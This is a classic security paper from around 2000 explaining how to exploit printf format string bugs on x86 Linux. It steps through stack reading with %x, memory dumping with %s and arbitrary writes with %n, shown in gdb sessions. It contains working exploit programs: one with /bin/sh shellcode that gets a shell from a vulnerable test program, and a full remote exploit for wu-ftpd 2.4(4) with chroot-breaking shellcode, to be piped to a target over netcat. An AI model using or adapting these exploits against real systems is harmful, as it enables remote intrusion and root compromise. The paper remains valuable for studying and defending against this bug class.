More info on format bugs. Pascal Bouchareine [ kalou ] - I Abstract This paper tries to explain how to exploit a printf(userinput) format bug, reported in some recent advisories. The approach is primary, and more precisely does not take into account any existing exploit (wu-ftpd, ...). A general knowledge of C programming and assembler is assumed throughout this article (stack issues, registers, endian storage). II Playground Let's begin with an experiment. Have a look at the following code : void main() { char tmp[512]; char buf[512]; while(1) { memset(buf, '\0', 512); read(0, buf, 512); sprintf(tmp, buf); printf("%s", tmp); } } It allocates a stack for tmp and buf (buf having the lower address on the stack), reads user input into buf, calls sprintf to fill tmp and prints out tmp. Let's try it : [pb@camel][formats]> ./t foo-bar foo-bar %x %x %x %x 25207825 78252078 a782520 0 Clumsy coders are used to see this kind of things, but let's see exactly what happens. When sprintf encounters a conversion string, it simply takes the first pushed word (32 bits, 4 bytes on intel) on the stack and in the case of "%x" converter, prints it to screen as hexadecimal. If arguments are explicitly given, it works well, but if they are missing and supposing sprintf's stack is empty, the function hits the caller's stack directly, provided that the stack is growing downward (intel architecture in the example). For more details, let's look at this second example: [pb@camel][formats]> gdb ./t GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu". (gdb) break sprintf Breakpoint 1 at 0x80481f3 (gdb) run Starting program: /usr/home/pb/code/format/./t %x Breakpoint 1, 0x80481f3 in _IO_sprintf () (gdb) x/20x $esp 0xbffff670: 0xbffffa80 0x080481af 0xbffff880 0xbffff680 0xbffff680: 0x000a7825 0x00000000 0x00000000 0x00000000 0xbffff690: 0x00000000 0x00000000 0x00000000 0x00000000 * 0xbffffa80 and 0x08481af are a plain stack frame footer * 0xbffffa80 is the calling function's stack frame address * 0x08481af is the return address in main(). Then there are two arguments for sprintf : * 0xbffff880 is tmp[]'s address * 0xbffff680 is buf[]'s address Look at what's just after this at address 0xbffff680. Yep, this is the beginning of main's stack frame, with the 0x400 alloc'ed bytes for tmp[] and buf[] where there is what have been entered as input: 0x000a7825 (little endian : %x\n). Let's look at the first example again: [pb@camel][formats]> ./t %x %x %x %x 25207825 78252078 a782520 0 The %x converter makes sprintf hit a part of the stack where you have : "\x25\x78\x20\x25....\x78\x0a\x00\x00\x00\x00" This is buf[]'s content, with the 0 terminating byte [a word in this case]. Let's study it more in detail, adding a function named do_it, with a 4 bytes stack of 0x04030201, and let's see what happens when sprintf(dst, "%x") is called from it: void do_it(char *d, char *s) { char buf[] = "\x01\x02\x03\x04"; sprintf(d, s); } main() { char tmp[512]; char buf[512]; while(1) { memset(buf, '\0', 512); read(0, buf, 512); do_it(tmp, buf); printf("%s", tmp); } } Of course, sprintf is expected to hit do_it()'s buf[] word, using %#010x as format converter: [pb@camel][formats]> ./t %#010x 0x04030201 So one has access to do_it()'s stack contents, and can guess main()'s stack frame address, and do_it's return address with ease: [pb@camel][formats]> ./t %#010x %x %x %x 0x04030201 bffffa00 bffffac0 80485af Oh, let's suppose this second pointer (0xbffffa00) is alloc'ed to push sprintf's argument, but 0xbffffac0 and 0x080485af are really the saved ebp, return address: (gdb) bt #0 0x8048526 in do_it () #1 0x80485af in main () (gdb) x/2x $ebp 0xbffff6b0: 0xbffffac0 0x080485af So easily, one has access to the calling function's stack frame address. In this example, you can easily remotely guess the location of a return address (main's, for example) to overwrite AND the address of the eggshell (if any): this is done by adding 0x04 to the caller's saved $ebp (the second element of this ($ebp, ret) pair is at 0xbffffac0 + 0x04 == 0xbffffac4): (gdb) x 0xbffffac4 0xbffffac4: 0x080484be (gdb) bt #0 0x8048526 in do_it () #1 0x80485af in main () #2 0x80484be in ___crt_dummy__ () So main's return address (#2) is in ___crt_dummy__ for the time being, but can be changed to anything you want if you can overwrite contents of 0xbffffac4... And for eggshell address, there are many ways to guess. The simplest way is to find buf[]'s address, which is [bottom of main's stack] - 0x200 + some stack allocated informations : (gdb) break memset Breakpoint 1 at 0x8048408 (gdb) c Continuing. %#010x %x %x %x 0x04030201 bffffa00 bffffa20 80485af Breakpoint 1, 0x40078428 in memset () (gdb) printf "%s\n", 0xbffffa00 - 0x200 + 0x20 %#010x %x %x %x Although this quite depends on the program you are running, you can see that methods to find a stack writable return address and a stack executable eggshell are quite easy. However, the best way to guess stack architecture remotely, when one has no access to the running process, is to "eat" the stack with many "%x" or "%...s" format converters until a [stack address, code segment address] pair is found and the user input string itself is dumped. Eating stack space with "junk" format converters until the beginning of input string is found is a really nice way to control what happens next: you now have controllable arguments to "%*" format converters, and this really, really comes in handy. Have a look at this (using the first example) : [pb@camel][formats]> ./t AAAA%x AAAA41414141 Remember, the stack is empty. The %x converter makes sprintf take the beginning of the input buffer as an arg-list for the format strings. One has *many* ways to play around with this. This "let me control the stack" feature is your friend just as gdb is. You can dump the whole stack, guess stack addresses, and even write to it (as will be explained later using %n converter). Let's look at this example : static char find_me[] = "..Buffer was lost in memory\n"; main() { char buf[512]; char tmp[512]; while(1) { memset(buf, '\0', 512); read(0, buf, 512); sprintf(tmp ,buf); printf("%s", tmp); } } The goal is to print the string find_me[]. In this simple example, you don't have to search (by %x dummy converters) how many bytes of stack you need to "eat" before you hit the input buffer: this is the very first one. (the example with "AAAA%x" showed it quite clearly). So you basically just have to issue the following "pseudo string" to print out the buffer: [4 bytes address of find_me]%s Yes! It is *that* simple: in this case, the input buffer is both the format string AND the format string argument.. :) Let's do it simply : [pb@camel][formats]> printf "\x02\x96\x04\x08%s\n" | ./v (garbage)Buffer was lost in memory The garbage is the beginning of the format string. So, you are able to dump any part of memory you need to. What was true with remote buffer overflows is not anymore: you dont NEED to seek return address anymore. You don't need to guess anything, since you can inspect memory to find it. (Er, this is true with printf() issues, but not when you can't see what the input produced. See setproctitle() for example.) Then comes the second (and more funny) part. III Writing into memory. All that wouldn't be that funny if we didn't have the "%n" format converter. This one takes an (int *) argument, and writes the number of bytes written *so far* to that location. Let's try this (with the very-simple-AAAA%x proggy again): [pb@camel][formats]> printf "\x70\xf7\xff\xbf%%n\n" > file [pb@camel][formats]> gdb ./t GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu". (no debugging symbols found)... (gdb) set args < file (gdb) break main Breakpoint 1 at 0x8048529 (gdb) run Starting program: /usr/home/pb/code/format/./t < file (no debugging symbols found)... Breakpoint 1, 0x8048529 in main () (gdb) watch *0xbffff770 Hardware watchpoint 2: *3221223280 (gdb) c Continuing. Hardware watchpoint 2: *3221223280 Old value = 0 New value = 4 0x400323f3 in vfprintf () (gdb) x 0xbffff770 0xbffff770: 0x00000004 This time, 4 bytes encoded into the format string (an address) are written and the "%n" converter made sprintf report this where it was told to (i.e. 0xbffff770). Let's play with this a little more. This time, the generated-file looks like this: printf "\x70\xf7\xff\xbf\x71\xf7\xff\xbf%%n%%n" > file After two watchpoint hits, at 0xbffff770 you have: (gdb) x 0xbffff770 0xbffff770: 0x00000808 sprintf wrote 8 bytes (two addresses), and "%n" made it report this to 0xbffff770 and 0xbffff771. Now, suppose you have an eggshell at 0xbffff710, and the guessed return address lies at 0xbffffa80. You can't afford to write 0xbffff710 bytes into the buffer to make sprintf (through the "%n" converter) write this value on the stack. Remember people are usually affraid of buffer overflows and therefore cut their input buffers :) But you can use a byte-per-byte construction to build the address. Since "%n" makes sprintf write the number of bytes written so far on the stack, you need to substract the number of bytes already written to each following fragment. Since the int * thing would erase bytes already written, you have to write address from the lower significant byte to the higher significant byte. Since you need to have written 0xff bytes before you can write the 0xbf byte, and moreover, you can only *increment* the internal number-of-written-bytes counter, you have to use 0x1bf, erasing a meaningless byte on the stack. Note that you could use the "%hn" converter, and make sprintf write short int arguments to the stack. But this won't be discussed here. Here is the "address builder" code explain so far: main() { char b1[255]; char b2[255]; char b3[255]; memset(b1, 0, 255); memset(b2, 0, 255); memset(b3, 0, 255); memset(b1, '\x90', 0xf7 - 0x10); memset(b2, '\x90', 0xff - 0xf7); memset(b3, '\x90', 0x01bf - 0xff); printf("\x80\xfa\xff\xbf" // arguments to the "%n" converter. "\x81\xfa\xff\xbf" // ditto "\x82\xfa\xff\xbf" // .. "\x83\xfa\xff\xbf" // last byte. "%%n" // 1) gives 0x10 ( 16 first bytes ) "%s%%n" // 2) gives 0xf7: string len is 0xf7 - 0x10 "%s%%n" // 3) gives 0xff: string len is 0xff - 0xf7 "%s%%n" // 4) gives 0x01bf: string len is 0x01bf - 0xff ,b1, b2, b3); // you now have 0xbffff710 at 0xbffffa80 } Let's try it: (after 3 hits on watchpoint) (gdb) c Continuing. Hardware watchpoint 3: *3221224064 Old value = 16774928 New value = -1073744112 0x400323f3 in vfprintf () (gdb) x/2 0xbffffa80 0xbffffa80: 0xbffff710 0xbf000001 Is seems to work quite well. The work is almost finished now, you just have to push an eggshell after all this format trick, and make the program jump back in it. Let's try to apply everything said before, with the following vulnerable program: IV Sample exploitation. void do_it(char *dst, char *src) { int foo; char bar; sprintf(dst, src); } main() { char buf[512]; char tmp[512]; memset(buf, '\0', 512); read(0, buf, 512); do_it(tmp, buf); printf("%s", tmp); } 1) First you have to find where's your input buffer, to control the format string. [pb@camel][formats]> gcc vuln.c -o v [pb@camel][formats]> ./v AAAA %x %c %x AAAA 0 À bffffac0 (int foo, char bar, stack) ... AAAA %x %x %x %x %x %x %x %x %x AAAA 0 bffffac0 bffffac0 804859f bffff6c0 bffff8c0 41414141 62203020 66666666 (the *output* buffer is at offset 28) Look at the stack frame, which is a (stack addr, code addr) pair: the return address in main is 0x0804859f, main's stack saved ebp and ret addr begins at 0xbffffac0. You now know that main's return address is at 0xbffffac4 (the second part of the [stack, code] pair is of course at pair + 4). Then you get some information about main's return address: printf "AAAA\xc0\xfa\xff\xbf%%x%%x%%x%%x%%x%%x%%x we try %%s\n\n"' | ./v \ | hexdump 0000000 4141 4141 fac0 bfff 6230 6666 6666 6361 0000010 6230 6666 6666 6361 3830 3430 3538 3838 0000020 6662 6666 3666 3063 6662 6666 3866 3063 0000030 3134 3134 3134 3134 7720 2065 7274 2079 0000040 fad4 bfff 84be 0804 0a01 000a stack/ret is 0xbffffad4/0x080484be (check this with gdb). Supposing do_it's frame is something like 0x400 bytes before main's frame, (in fact, it is 0x410 bytes), you can find do_it's stack frame address, since you know that there must be main's saved frame pointer followed by a code segment return address, then by main's stack: after a lot of tries you have: printf "AAAA\xb0\xf6\xff\xbf%%x%%x%%x%%x%%x%%x%%x we try %%s\n\n"' | ./v \ | hexdump 0000000 4141 4141 f6b0 bfff 6230 6666 6666 6361 0000010 6230 6666 6666 6361 3830 3430 3538 3838 0000020 6662 6666 3666 3063 6662 6666 3866 3063 0000030 3134 3134 3134 3134 7720 2065 7274 2079 0000040 fac0 bfff 8588 0804 f6c0 bfff f8c0 bfff 0000050 4141 4141 f6b0 bfff 6230 6666 6666 6361 0000060 6230 6666 6666 6361 3830 3430 3538 3838 0000070 6662 6666 3666 3063 6662 6666 3866 3063 0000080 3134 3134 3134 3134 7720 2065 7274 2079 0000090 0a0a (this prints "..we try [contents of 0xbffff6b0]) Bingo! There you have (we try .. is just before offset 0x40) 0xbffffac0,0x08048588 at 0xbffff6b0. Remember the (stack, code) pair addresses ? This is in fact do_it's stack frame. You can see sprintf's args just after: 0xbffff6c0 and 0xbffff8c0. These are addresses of the two buffers. 0x41414141 is the beginning of the input buffer, so you can see that hexdump's offset 0x50 is at address 0xbffff6c0, and since you are good at math, you confirm that hexdump's offset 0x40 is indeed at 0xbffff6b0. This process lets you remotely guess 1) stack return address, 2) buffer address. You have all the information you need to format the stack, so let's get to the next step: build the eggshell & the appropriate buffer. The buffer will lie at 0xbffff8c0. BUT, since it is filled with lots of illegal instructions (i.e. the format converters), the "\x90" string must end with a "\xeb\x02" to jump over the "%n" format converters, therefore, you need not worry about the effective egg address. So all you need to do is to push 4 addresses (one address per byte of the return address to overwrite), a series of "%x" converters to "eat" stack space, then a series of nops followed by a "%n" converter (in order to build the return address) and somewhere the eggshell. Tough this is not the easiest part, a little brain boost (coffe, cocaine, coca-cola(tm), anything you like) leads to : void main() { char b1[255]; char b2[255]; char b3[255]; char b4[255]; char xx[600]; int i; char egg[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; // ( (void (*)()) egg)(); memset(b1, 0, 255); memset(b2, 0, 255); memset(b3, 0, 255); memset(b4, 0, 255); memset(xx, 0, 513); for (i = 0; i < 12 ; i += 2) { /* setup the 6 "%x" to eat stack space */ strcpy(&xx[i], "%x"); } memset(b1, '\x90', 0xd0 - 16 - 12 - 2 - 28); // 16 (4 addresses) // 2 (%n) // 40 (%x output - "guess it..") // use nice formats for // fixed output size... :) // + 200- (4 bytes) memset(b2, '\x90', 0xf8 - 0xd0 - 2); // first 0x90 string is at // 0xbffff8d0.. (c0 + 4 * 4 bytes) :) // -2 because of "\xeb\x02" memset(b3, '\x90', 0xff - 0xf8 - 2); // ditto, with -2. memset(b4, '\x90', 0x01bf - 0xff - 2); // ditto. printf("\xb4\xf6\xff\xbf" // "\xb5\xf6\xff\xbf" // this points to do_it's "\xb6\xf6\xff\xbf" // return address storage word. "\xb7\xf6\xff\xbf" // "%s" // 0) there are 6 "%x", to eat stack until the input buf // begins to control the format strings. "%s\xeb\x02%%n" // 1) gives 0xd0 (4 * 4 bytes add, %x are ignored ) "%s\xeb\x02%%n" // 2) gives 0xf9 "%s\xeb\x02%%n" // 3) gives 0xff "%s\xeb\x02%%n%s" // 4) gives 0x01bf , xx, b1, b2, b3, b4, egg); } Let's give it a final try: [pb@camel][formats]> ( ./b ; cat ) | ./v id uid=1001(pb) gid=100(users) groups=100(users) date Sat Jul 15 22:15:07 CEST 2000 .5 Conclusion. These format bugs are really nasty. First, if you can read the output of the final buffer (e.g. printf(Userinput)), you obviously have control over the computer processing it. You have some kind of remote-debugger-access to the machine, that allows you to get in at the first try. These are bad news for developpers. (wu-ftpd format bug used by an aware person is a one-try remote root..). Playing around format args and pointers allows us to construct some kind of "generic format string" that will overwrite *certainly* the caller's return address. This must be coupled with a remote return address guess to work properly, but gives *at least* the same luck rate as remote buffer overruns. Even if you don't see what you do (setproctitle), this is still an easy way to get in. .6 - garbage & greetings - This is what I built against my old wu-ftpd [wu-2.4(4)] using the above technique. It worked, but i had to cut my intput format string to 512 bytes : I included the eggshell in another part of memory, using the PASS command. This address is still easy to guess. /* * Sample example - part 2: wu-ftpd v2.4(4), exploitation. * * usage: * 1) find the right address location/eggshell location * this is easy with a little play around %s and hexdump. * Then, fix this exploit. * * 2) (echo "user ftp"; ./exploit; cat) | nc host 21 * * echo ^[c to clear your screen if needed. * * Don't forget 0xff must be escaped with 0xff. * * */ main() { char b1[255]; char b2[255]; char b3[255]; char b4[255]; char xx[600]; int i; char egg[]= /* Lam3rZ chroot() code */ "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb" "\x43\x89\xd9\x41\xb0\x3f\xcd\x80" "\xeb\x6b\x5e\x31\xc0\x31" "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27" "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31" "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d" "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46" "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8" "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0" "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff" "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31"; // ( (void (*)()) egg)(); memset(b1, 0, 255); memset(b2, 0, 255); memset(b3, 0, 255); memset(b4, 0, 255); memset(xx, 0, 513); for (i = 0; i < 20 ; i += 2) { /* setup up the 10 %x to eat stack space */ strcpy(&xx[i], "%x"); } memset(b1, '\x90', 0xa3 - 0x50); memset(b2, '\x90', 0xfe - 0xa3 - 2); memset(b3, '\x90', 0xff - 0xfe); memset(b4, '\x90', 0x01bf - 0xff); // build ret address here. // i found 0xbffffea3 printf("pass %s@oonanism.com\n", egg); printf("site exec .." "\x64\xf9\xff\xff\xbf" // insert ret location there. "\x65\xf9\xff\xff\xbf" // i had 0xbffff964 "\x66\xf9\xff\xff\xbf" "\x67\xf9\xff\xff\xbf" "%s" "%s\xeb\x02%%n" "%s\xeb\x02%%n" "%s%%n" "%s%%n\n" , xx, b1, b2, b3, b4); } - many thanks to... ("grep yourself or ignore this part") The best goes to Ouaou - Ignacy Gawedzki , who drastically changed this article and made something understandable with it. My english sucks, he's a babelfish.. Flaoua, my roomy, helped a lot, bearing me, my machines and my monomania. Try her cookies someday. Gaius, cleb - I need a beer. HERT guys, since they own me. ADM, great, productive work, and with humor, doh. Michal Zalewski, Solar Designer - they're my heroes. Enough greetings for such a bad paper, hope you enjoyed it.